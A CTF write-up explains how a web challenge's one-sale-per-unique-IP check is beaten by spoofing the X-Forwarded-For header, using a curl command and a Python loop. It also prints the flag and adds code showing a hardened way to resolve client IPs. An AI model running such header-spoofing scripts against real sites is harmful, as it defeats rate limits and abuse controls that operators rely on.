Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
BreakIn CTF 2018 - Aalekh and his Business - Web - 500
Posted: 23 Jan 2018 at 10:22 by Codehead


Aalekh joined IIIT in 2014. Soon, he started selling T-shirts and hoodies. One day, Aalekh got a big order and trusted his childhood friend to handle the order. But his friend betrayed him and sold bad pieces. College students got angry and tried to beat Aalekh up. His good friend, Anshul, wanted to save him. To prevent Aalekh from going under loss, he has to sell 500 T-shirts on the market, the only condition being, customers have to be unique.

Can you help Anshul sell 500 T-shirts?

Flag Format: BREAKIN{[0-9A-Za-z_]+}


Visiting the URL in the challenge created a UID and generated the following URL:

Visiting this URL told me I had sold my first T-shirt.

Please hit from different ip. 499 left

Refreshing the page did nothing; I needed to appear as another customer (i.e. have a different IP address) to sell another shirt.

I didn’t feel like rebooting my router to pick up a new IP from my ISP, so I used curl to set an X-Forwarded-For header. This is the header a proxy adds to pass along the address of the machine whose traffic it is forwarding, and because the target trusted it without checking where the request really came from, we could set it to any address we liked.

$ curl --header "X-Forwarded-For:" ""
Woah! New hit. Go ahead only 498 left

That works great, but 498 more hits is too much to type by hand; we need to script a solution.

Using Python, we can easily set up a request with the required headers and generate a whole bunch of unique IPs to cycle through to sell those remaining 498 T-Shirts.

import requests
import sys
import time

# The challenge URL (including the per-session UID) was not preserved in the post.
url = ''

for x in range(1, 5):
    for y in range(1, 254):
        # Each request claims a fresh client address via X-Forwarded-For.
        hd = {'X-Forwarded-For': '10.1.' + str(x) + '.' + str(y)}
        response = requests.get(url, headers=hd)
        print(response.text)
        sys.stdout.flush()  # force the console to update on long runs
        time.sleep(0.5)     # throttle; removed later to beat the UID timeout

The flush() call is there because I don’t always see the output on long-running scripts; flush() forces the console to update.

I put a sleep() call in so that I wouldn’t hammer the server too much. It seemed to be quite slow and I didn’t want to make that any worse. However, the UID only appeared to stay valid for a few minutes and I had to start again with a new UID and remove the delay to fit 500 requests in before the timeout.

With a fresh UID and no delay, the script ran flawlessly.

Woah! New hit. Go ahead only 497 left
Woah! New hit. Go ahead only 496 left
Woah! New hit. Go ahead only 2 left
Woah! New hit. Go ahead only 1 left
Woah! Do did it. Flag is BREAKIN{dhandhesebadhakoidharmnhihota}
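The trick worked because the server treated X-Forwarded-For as the customer's identity. As an added example (not code from the original post or the challenge), here is that naive lookup beside a hardened one that only believes the header when the TCP peer is one of our own reverse proxies, and walks the chain from the right to the first hop we do not operate. The proxy and client addresses are constructed for the example, and the shirt counter just mimics the challenge's responses.

```python
import ipaddress
from typing import Callable, Optional

# Addresses of the reverse proxies we operate (constructed for this example).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def naive_client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """The pattern the challenge server used: believe X-Forwarded-For outright."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """Trust X-Forwarded-For only when the peer is our proxy, and take the
    right-most hop that is not one of our proxies: the address we actually saw."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff:
        return str(peer)  # direct client: the header is unverifiable, ignore it
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed hop: stop trusting anything to the left of it
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)  # nothing usable: fall back to the peer we can verify


def sell(counter: dict, remote_addr: str, xff: Optional[str],
         resolver: Callable[[str, Optional[str]], str]) -> str:
    """Simulates the challenge's one-shirt-per-unique-customer rule."""
    ip = resolver(remote_addr, xff)
    if ip in counter["seen"]:
        return "Please hit from different ip. %d left" % counter["left"]
    counter["seen"].add(ip)
    counter["left"] -= 1
    return "Woah! New hit. Go ahead only %d left" % counter["left"]


if __name__ == "__main__":
    # One direct client (203.0.113.9, constructed) sending two spoofed headers.
    for resolver in (naive_client_ip, client_ip):
        shop = {"seen": set(), "left": 500}
        print(resolver.__name__, sell(shop, "203.0.113.9", "10.1.1.1", resolver))
        print(resolver.__name__, sell(shop, "203.0.113.9", "10.1.1.2", resolver))
```

With the naive resolver the same client is counted twice; with the hardened one the second spoofed header is refused, so the count only moves when the peer address itself changes.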


Categories: Hacking CTF
